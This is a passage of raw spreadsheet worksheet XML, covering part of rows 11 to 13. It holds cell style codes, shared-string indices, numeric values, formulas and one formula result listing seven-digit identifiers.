      <c r="MI11" s="127"/>
      <c r="MJ11" s="127"/>
      <c r="MK11" s="127"/>
      <c r="ML11" s="127"/>
      <c r="MM11" s="127"/>
      <c r="MN11" s="127"/>
      <c r="MO11" s="127"/>
      <c r="MP11" s="127"/>
      <c r="MQ11" s="127"/>
      <c r="MR11" s="127"/>
      <c r="MS11" s="127"/>
      <c r="MT11" s="127"/>
      <c r="MU11" s="127"/>
      <c r="MV11" s="127"/>
      <c r="MW11" s="127"/>
      <c r="MX11" s="127"/>
      <c r="MY11" s="127"/>
      <c r="MZ11" s="127"/>
      <c r="NA11" s="127"/>
      <c r="NB11" s="127"/>
      <c r="NC11" s="127"/>
      <c r="ND11" s="127"/>
      <c r="NE11" s="127"/>
      <c r="NF11" s="127"/>
      <c r="NG11" s="127"/>
      <c r="NH11" s="127"/>
      <c r="NI11" s="127"/>
      <c r="NJ11" s="127"/>
      <c r="NK11" s="127"/>
      <c r="NL11" s="127"/>
      <c r="NM11" s="127"/>
      <c r="NN11" s="127"/>
      <c r="NO11" s="127"/>
      <c r="NP11" s="127"/>
      <c r="NQ11" s="127"/>
      <c r="NR11" s="127"/>
      <c r="NS11" s="127"/>
      <c r="NT11" s="127"/>
      <c r="NU11" s="127"/>
      <c r="NV11" s="127"/>
      <c r="NW11" s="127"/>
      <c r="NX11" s="127"/>
      <c r="NY11" s="127"/>
    </row>
    <row r="12" ht="219.0" customHeight="1">
      <c r="B12" s="89" t="s">
        <v>292</v>
      </c>
      <c r="C12" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D12" s="90" t="s">
        <v>293</v>
      </c>
      <c r="E12" s="90" t="s">
        <v>394</v>
      </c>
      <c r="F12" s="90" t="s">
        <v>395</v>
      </c>
      <c r="G12" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H12" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I12" s="92" t="s">
        <v>396</v>
      </c>
      <c r="J12" s="92" t="s">
        <v>397</v>
      </c>
      <c r="K12" s="92" t="s">
        <v>398</v>
      </c>
      <c r="L12" s="93" t="s">
        <v>399</v>
      </c>
      <c r="M12" s="93">
        <v>68.0</v>
      </c>
      <c r="N12" s="93">
        <v>1.0</v>
      </c>
      <c r="O12" s="93">
        <v>1.0</v>
      </c>
      <c r="P12" s="93">
        <v>1.0</v>
      </c>
      <c r="Q12" s="93">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R12" s="93">
        <v>1.0</v>
      </c>
      <c r="S12" s="93">
        <v>1.0</v>
      </c>
      <c r="T12" s="94" t="s">
        <v>400</v>
      </c>
      <c r="U12" s="137" t="s">
        <v>401</v>
      </c>
      <c r="V12" s="138" t="s">
        <v>402</v>
      </c>
      <c r="W12" s="96" t="s">
        <v>403</v>
      </c>
      <c r="X12" s="132" t="s">
        <v>404</v>
      </c>
      <c r="Y12" s="126" t="s">
        <v>405</v>
      </c>
      <c r="Z12" s="132" t="s">
        <v>406</v>
      </c>
      <c r="AA12" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB12" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC12" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD12" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE12" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF12" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG12" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH12" s="99" t="s">
        <v>407</v>
      </c>
      <c r="AI12" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ12" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK12" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL12" s="100">
        <v>0.0</v>
      </c>
      <c r="AM12" s="100">
        <v>0.0</v>
      </c>
      <c r="AN12" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO12" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP12" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ12" s="100">
        <v>0.0</v>
      </c>
      <c r="AR12" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS12" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT12" s="100" t="str">
        <f t="shared" si="2"/>
        <v>-</v>
      </c>
      <c r="AU12" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV12" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW12" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX12" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY12" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ12" s="100">
        <v>0.0</v>
      </c>
      <c r="BA12" s="102">
        <v>68.0</v>
      </c>
      <c r="BB12" s="102">
        <v>0.0</v>
      </c>
      <c r="BC12" s="102">
        <v>0.0</v>
      </c>
      <c r="BD12" s="102">
        <v>0.0</v>
      </c>
      <c r="BE12" s="102">
        <v>0.0</v>
      </c>
      <c r="BF12" s="102">
        <v>0.0</v>
      </c>
      <c r="BG12" s="102">
        <v>0.0</v>
      </c>
      <c r="BH12" s="102">
        <v>0.0</v>
      </c>
      <c r="BI12" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ12" s="102">
        <v>0.0</v>
      </c>
      <c r="BK12" s="102">
        <v>0.0</v>
      </c>
      <c r="BL12" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM12" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN12" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO12" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP12" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ12" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR12" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS12" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT12" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU12" s="103">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="BV12" s="103">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="BW12" s="104">
        <v>2000418.0</v>
      </c>
      <c r="BX12" s="104">
        <v>1.0</v>
      </c>
      <c r="BY12" s="104">
        <v>1.0</v>
      </c>
      <c r="BZ12" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA12" s="104">
        <v>2000418.0</v>
      </c>
      <c r="CB12" s="104">
        <v>1.0</v>
      </c>
      <c r="CC12" s="104">
        <v>1.0</v>
      </c>
      <c r="CD12" s="104">
        <v>2000418.0</v>
      </c>
      <c r="CE12" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF12" s="104">
        <f t="shared" si="14"/>
        <v>2000418</v>
      </c>
      <c r="CG12" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH12" s="104">
        <v>2000418.0</v>
      </c>
      <c r="CI12" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ12" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK12" s="104">
        <v>0.0</v>
      </c>
      <c r="CL12" s="104">
        <v>0.0</v>
      </c>
      <c r="CM12" s="105">
        <v>68.0</v>
      </c>
      <c r="CN12" s="105">
        <v>1.0</v>
      </c>
      <c r="CO12" s="105">
        <v>1.0</v>
      </c>
      <c r="CP12" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ12" s="105">
        <v>1.0</v>
      </c>
      <c r="CR12" s="105">
        <v>1.0</v>
      </c>
      <c r="CS12" s="105">
        <v>0.0</v>
      </c>
      <c r="CT12" s="105">
        <v>0.0</v>
      </c>
      <c r="CU12" s="105">
        <v>0.0</v>
      </c>
      <c r="CV12" s="105">
        <v>0.0</v>
      </c>
      <c r="CW12" s="105">
        <v>1.0</v>
      </c>
      <c r="CX12" s="105">
        <v>1.0</v>
      </c>
      <c r="CY12" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ12" s="105">
        <v>1.0</v>
      </c>
      <c r="DA12" s="105">
        <v>1.0</v>
      </c>
      <c r="DB12" s="106">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="DC12" s="106">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="DD12" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE12" s="106">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="DF12" s="106">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="DG12" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH12" s="106">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="DI12" s="106">
        <f t="shared" si="22"/>
        <v>1</v>
      </c>
      <c r="DJ12" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK12" s="107">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="DL12" s="106">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="DM12" s="108">
        <v>2000418.0</v>
      </c>
      <c r="DN12" s="108">
        <v>1.0</v>
      </c>
      <c r="DO12" s="108">
        <v>1.0</v>
      </c>
      <c r="DP12" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ12" s="108">
        <v>2000418.0</v>
      </c>
      <c r="DR12" s="108">
        <v>1.0</v>
      </c>
      <c r="DS12" s="108">
        <v>1.0</v>
      </c>
      <c r="DT12" s="108">
        <v>2000418.0</v>
      </c>
      <c r="DU12" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV12" s="108">
        <f t="shared" si="63"/>
        <v>2000418</v>
      </c>
      <c r="DW12" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX12" s="108">
        <v>2000418.0</v>
      </c>
      <c r="DY12" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ12" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA12" s="108">
        <v>0.0</v>
      </c>
      <c r="EB12" s="108">
        <v>0.0</v>
      </c>
      <c r="EC12" s="109">
        <v>68.0</v>
      </c>
      <c r="ED12" s="109">
        <v>1.0</v>
      </c>
      <c r="EE12" s="109">
        <v>1.0</v>
      </c>
      <c r="EF12" s="109">
        <v>0.0</v>
      </c>
      <c r="EG12" s="109">
        <v>1.0</v>
      </c>
      <c r="EH12" s="109">
        <v>1.0</v>
      </c>
      <c r="EI12" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ12" s="109">
        <v>0.0</v>
      </c>
      <c r="EK12" s="109">
        <v>0.0</v>
      </c>
      <c r="EL12" s="109">
        <v>0.0</v>
      </c>
      <c r="EM12" s="109">
        <v>1.0</v>
      </c>
      <c r="EN12" s="109">
        <v>1.0</v>
      </c>
      <c r="EO12" s="109">
        <v>0.0</v>
      </c>
      <c r="EP12" s="109">
        <v>1.0</v>
      </c>
      <c r="EQ12" s="109">
        <v>1.0</v>
      </c>
      <c r="ER12" s="110">
        <f t="shared" si="27"/>
        <v>1</v>
      </c>
      <c r="ES12" s="110">
        <f t="shared" si="28"/>
        <v>1</v>
      </c>
      <c r="ET12" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU12" s="110">
        <f t="shared" si="30"/>
        <v>1</v>
      </c>
      <c r="EV12" s="110">
        <f t="shared" si="31"/>
        <v>1</v>
      </c>
      <c r="EW12" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX12" s="110">
        <f t="shared" si="33"/>
        <v>1</v>
      </c>
      <c r="EY12" s="110">
        <f t="shared" si="34"/>
        <v>1</v>
      </c>
      <c r="EZ12" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA12" s="110">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="FB12" s="110">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="FC12" s="111" t="s">
        <v>408</v>
      </c>
      <c r="FD12" s="111">
        <v>8.0</v>
      </c>
      <c r="FE12" s="111">
        <v>101.0</v>
      </c>
      <c r="FF12" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG12" s="111" t="s">
        <v>409</v>
      </c>
      <c r="FH12" s="111">
        <v>6.0</v>
      </c>
      <c r="FI12" s="111">
        <v>97.0</v>
      </c>
      <c r="FJ12" s="111" t="s">
        <v>408</v>
      </c>
      <c r="FK12" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL12" s="111" t="str">
        <f t="shared" si="64"/>
        <v>2002752, 2002749, 2000418, 2011803, 2003303, 2003410, 2015016, 2036752</v>
      </c>
      <c r="FM12" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN12" s="111" t="s">
        <v>408</v>
      </c>
      <c r="FO12" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP12" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ12" s="111">
        <v>0.0</v>
      </c>
      <c r="FR12" s="111">
        <v>0.0</v>
      </c>
      <c r="FS12" s="112">
        <v>68.0</v>
      </c>
      <c r="FT12" s="112">
        <v>34.0</v>
      </c>
      <c r="FU12" s="112">
        <v>99.0</v>
      </c>
      <c r="FV12" s="112">
        <v>0.0</v>
      </c>
      <c r="FW12" s="112">
        <v>101.0</v>
      </c>
      <c r="FX12" s="112">
        <v>101.0</v>
      </c>
      <c r="FY12" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ12" s="112">
        <v>0.0</v>
      </c>
      <c r="GA12" s="112">
        <v>0.0</v>
      </c>
      <c r="GB12" s="112">
        <v>0.0</v>
      </c>
      <c r="GC12" s="112">
        <v>33.0</v>
      </c>
      <c r="GD12" s="112">
        <v>97.0</v>
      </c>
      <c r="GE12" s="112">
        <v>0.0</v>
      </c>
      <c r="GF12" s="112">
        <v>97.0</v>
      </c>
      <c r="GG12" s="112">
        <v>97.0</v>
      </c>
      <c r="GH12" s="113">
        <f t="shared" si="39"/>
        <v>34</v>
      </c>
      <c r="GI12" s="113">
        <f t="shared" si="40"/>
        <v>33</v>
      </c>
      <c r="GJ12" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK12" s="113">
        <f t="shared" si="42"/>
        <v>99</v>
      </c>
      <c r="GL12" s="113">
        <f t="shared" si="43"/>
        <v>97</v>
      </c>
      <c r="GM12" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN12" s="113">
        <f t="shared" si="45"/>
        <v>101</v>
      </c>
      <c r="GO12" s="113">
        <f t="shared" si="46"/>
        <v>97</v>
      </c>
      <c r="GP12" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ12" s="114">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="GR12" s="113">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="GS12" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT12" s="94"/>
      <c r="GU12" s="130">
        <v>12449.0</v>
      </c>
      <c r="GV12" s="116">
        <v>1.0</v>
      </c>
      <c r="GW12" s="116">
        <v>1.0</v>
      </c>
      <c r="GX12" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY12" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ12" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA12" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB12" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC12" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD12" s="131">
        <v>12449.0</v>
      </c>
      <c r="HE12" s="131">
        <v>12449.0</v>
      </c>
      <c r="HF12" s="117" t="str">
        <f t="shared" si="50"/>
        <v>-</v>
      </c>
      <c r="HG12" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH12" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI12" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ12" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK12" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL12" s="93">
        <v>37.0</v>
      </c>
      <c r="HM12" s="93">
        <f t="shared" si="52"/>
        <v>0</v>
      </c>
      <c r="HN12" s="93">
        <v>0.0</v>
      </c>
      <c r="HO12" s="93">
        <v>0.0</v>
      </c>
      <c r="HP12" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ12" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR12" s="118">
        <f t="shared" si="54"/>
        <v>0.5</v>
      </c>
      <c r="HS12" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT12" s="119" t="s">
        <v>399</v>
      </c>
      <c r="HU12" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV12" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW12" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX12" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY12" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ12" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA12" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB12" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC12" s="120" t="str">
        <f t="shared" ref="IC12:IC17" si="65">HV12</f>
        <v>-</v>
      </c>
      <c r="ID12" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE12" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF12" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG12" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH12" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II12" s="99" t="s">
        <v>410</v>
      </c>
      <c r="IJ12" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK12" s="99">
        <v>62.0</v>
      </c>
      <c r="IL12" s="99">
        <v>0.0</v>
      </c>
      <c r="IM12" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN12" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO12" s="98">
        <v>0.0</v>
      </c>
      <c r="IP12" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ12" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR12" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS12" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT12" s="127"/>
      <c r="IU12" s="127"/>
      <c r="IV12" s="127"/>
      <c r="IW12" s="127"/>
      <c r="IX12" s="127"/>
      <c r="IY12" s="127"/>
      <c r="IZ12" s="127"/>
      <c r="JA12" s="127"/>
      <c r="JB12" s="127"/>
      <c r="JC12" s="127"/>
      <c r="JD12" s="127"/>
      <c r="JE12" s="127"/>
      <c r="JF12" s="127"/>
      <c r="JG12" s="127"/>
      <c r="JH12" s="127"/>
      <c r="JI12" s="127"/>
      <c r="JJ12" s="127"/>
      <c r="JK12" s="127"/>
      <c r="JL12" s="127"/>
      <c r="JM12" s="127"/>
      <c r="JN12" s="127"/>
      <c r="JO12" s="127"/>
      <c r="JP12" s="127"/>
      <c r="JQ12" s="127"/>
      <c r="JR12" s="127"/>
      <c r="JS12" s="127"/>
      <c r="JT12" s="127"/>
      <c r="JU12" s="127"/>
      <c r="JV12" s="127"/>
      <c r="JW12" s="127"/>
      <c r="JX12" s="127"/>
      <c r="JY12" s="127"/>
      <c r="JZ12" s="127"/>
      <c r="KA12" s="127"/>
      <c r="KB12" s="127"/>
      <c r="KC12" s="127"/>
      <c r="KD12" s="127"/>
      <c r="KE12" s="127"/>
      <c r="KF12" s="127"/>
      <c r="KG12" s="127"/>
      <c r="KH12" s="127"/>
      <c r="KI12" s="127"/>
      <c r="KJ12" s="127"/>
      <c r="KK12" s="127"/>
      <c r="KL12" s="127"/>
      <c r="KM12" s="127"/>
      <c r="KN12" s="127"/>
      <c r="KO12" s="127"/>
      <c r="KP12" s="127"/>
      <c r="KQ12" s="127"/>
      <c r="KR12" s="127"/>
      <c r="KS12" s="127"/>
      <c r="KT12" s="127"/>
      <c r="KU12" s="127"/>
      <c r="KV12" s="127"/>
      <c r="KW12" s="127"/>
      <c r="KX12" s="127"/>
      <c r="KY12" s="127"/>
      <c r="KZ12" s="127"/>
      <c r="LA12" s="127"/>
      <c r="LB12" s="127"/>
      <c r="LC12" s="127"/>
      <c r="LD12" s="127"/>
      <c r="LE12" s="127"/>
      <c r="LF12" s="127"/>
      <c r="LG12" s="127"/>
      <c r="LH12" s="127"/>
      <c r="LI12" s="127"/>
      <c r="LJ12" s="127"/>
      <c r="LK12" s="127"/>
      <c r="LL12" s="127"/>
      <c r="LM12" s="127"/>
      <c r="LN12" s="127"/>
      <c r="LO12" s="127"/>
      <c r="LP12" s="127"/>
      <c r="LQ12" s="127"/>
      <c r="LR12" s="127"/>
      <c r="LS12" s="127"/>
      <c r="LT12" s="127"/>
      <c r="LU12" s="127"/>
      <c r="LV12" s="127"/>
      <c r="LW12" s="127"/>
      <c r="LX12" s="127"/>
      <c r="LY12" s="127"/>
      <c r="LZ12" s="127"/>
      <c r="MA12" s="127"/>
      <c r="MB12" s="127"/>
      <c r="MC12" s="127"/>
      <c r="MD12" s="127"/>
      <c r="ME12" s="127"/>
      <c r="MF12" s="127"/>
      <c r="MG12" s="127"/>
      <c r="MH12" s="127"/>
      <c r="MI12" s="127"/>
      <c r="MJ12" s="127"/>
      <c r="MK12" s="127"/>
      <c r="ML12" s="127"/>
      <c r="MM12" s="127"/>
      <c r="MN12" s="127"/>
      <c r="MO12" s="127"/>
      <c r="MP12" s="127"/>
      <c r="MQ12" s="127"/>
      <c r="MR12" s="127"/>
      <c r="MS12" s="127"/>
      <c r="MT12" s="127"/>
      <c r="MU12" s="127"/>
      <c r="MV12" s="127"/>
      <c r="MW12" s="127"/>
      <c r="MX12" s="127"/>
      <c r="MY12" s="127"/>
      <c r="MZ12" s="127"/>
      <c r="NA12" s="127"/>
      <c r="NB12" s="127"/>
      <c r="NC12" s="127"/>
      <c r="ND12" s="127"/>
      <c r="NE12" s="127"/>
      <c r="NF12" s="127"/>
      <c r="NG12" s="127"/>
      <c r="NH12" s="127"/>
      <c r="NI12" s="127"/>
      <c r="NJ12" s="127"/>
      <c r="NK12" s="127"/>
      <c r="NL12" s="127"/>
      <c r="NM12" s="127"/>
      <c r="NN12" s="127"/>
      <c r="NO12" s="127"/>
      <c r="NP12" s="127"/>
      <c r="NQ12" s="127"/>
      <c r="NR12" s="127"/>
      <c r="NS12" s="127"/>
      <c r="NT12" s="127"/>
      <c r="NU12" s="127"/>
      <c r="NV12" s="127"/>
      <c r="NW12" s="127"/>
      <c r="NX12" s="127"/>
      <c r="NY12" s="127"/>
    </row>
    <row r="13" ht="222.75" customHeight="1">
      <c r="B13" s="89" t="s">
        <v>310</v>
      </c>
      <c r="C13" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D13" s="90" t="s">
        <v>311</v>
      </c>
      <c r="E13" s="90" t="s">
        <v>411</v>
      </c>
      <c r="F13" s="90" t="s">
        <v>412</v>
      </c>
      <c r="G13" s="91" t="s">
        <v>12</v>
      </c>
      <c r="H13" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I13" s="92" t="s">
        <v>413</v>
      </c>
      <c r="J13" s="92" t="s">
        <v>414</v>
      </c>
      <c r="K13" s="92" t="s">
        <v>415</v>
      </c>
      <c r="L13" s="93" t="s">
        <v>253</v>
      </c>
      <c r="M13" s="93">
        <v>13.0</v>
      </c>
      <c r="N13" s="93">
        <v>1.0</v>
      </c>
      <c r="O13" s="93">
        <v>0.0</v>
      </c>
      <c r="P13" s="93">
        <v>1.0</v>
      </c>
      <c r="Q13" s="93">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R13" s="93">
        <v>1.0</v>
      </c>
      <c r="S13" s="93">
        <v>0.0</v>
      </c>
      <c r="T13" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U13" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V13" s="96" t="s">
        <v>416</v>
      </c>
      <c r="W13" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X13" s="97" t="s">
        <v>417</v>
      </c>
      <c r="Y13" s="96" t="s">
        <v>418</v>
      </c>
      <c r="Z13" s="96" t="s">
        <v>419</v>
      </c>
      <c r="AA13" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB13" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC13" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD13" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE13" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF13" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG13" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH13" s="99" t="s">
        <v>420</v>
      </c>
      <c r="AI13" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ13" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK13" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL13" s="100">
        <v>0.0</v>
      </c>
      <c r="AM13" s="100">
        <v>0.0</v>
      </c>
      <c r="AN13" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO13" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP13" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ13" s="100">
        <v>0.0</v>
      </c>
      <c r="AR13" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS13" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT13" s="100" t="str">
        <f t="shared" si="2"/>
        <v>-</v>
      </c>
      <c r="AU13" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV13" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW13" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX13" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY13" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ13" s="100">
        <v>0.0</v>
      </c>
      <c r="BA13" s="102">
        <v>13.0</v>
      </c>
      <c r="BB13" s="102">
        <v>0.0</v>
      </c>
      <c r="BC13" s="102">
        <v>0.0</v>
      </c>
      <c r="BD13" s="102">
        <v>0.0</v>
      </c>
      <c r="BE13" s="102">
        <v>0.0</v>
      </c>
      <c r="BF13" s="102">
        <v>0.0</v>
      </c>
      <c r="BG13" s="102">
        <v>0.0</v>
      </c>
      <c r="BH13" s="102">
        <v>0.0</v>
      </c>
      <c r="BI13" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ13" s="102">
        <v>0.0</v>
      </c>
      <c r="BK13" s="102">
        <v>0.0</v>
      </c>
      <c r="BL13" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM13" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN13" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO13" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP13" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ13" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR13" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS13" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT13" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU13" s="103">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="BV13" s="103">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="BW13" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX13" s="104">
        <v>0.0</v>
      </c>
      <c r="BY13" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ13" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA13" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB13" s="104">
        <v>0.0</v>
      </c>
      <c r="CC13" s="104">
        <v>0.0</v>
      </c>
      <c r="CD13" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE13" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF13" s="104" t="str">
        <f t="shared" si="14"/>
        <v>-</v>
      </c>
      <c r="CG13" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH13" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI13" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ13" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK13" s="104">
        <v>0.0</v>
      </c>
      <c r="CL13" s="104">
        <v>0.0</v>
      </c>
      <c r="CM13" s="105">
        <v>13.0</v>
      </c>
      <c r="CN13" s="105">
        <v>0.0</v>
      </c>
      <c r="CO13" s="105">
        <v>0.0</v>
      </c>
      <c r="CP13" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ13" s="105">
        <v>0.0</v>
      </c>
      <c r="CR13" s="105">
        <v>0.0</v>
      </c>
      <c r="CS13" s="105">
        <v>0.0</v>
      </c>
      <c r="CT13" s="105">
        <v>0.0</v>
      </c>
      <c r="CU13" s="105">
        <v>0.0</v>
      </c>
      <c r="CV13" s="105">
        <v>0.0</v>
      </c>
      <c r="CW13" s="105">
        <v>0.0</v>
      </c>
      <c r="CX13" s="105">
        <v>0.0</v>
      </c>
      <c r="CY13" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ13" s="105">
        <v>0.0</v>
      </c>
      <c r="DA13" s="105">
        <v>0.0</v>
      </c>
      <c r="DB13" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC13" s="106">
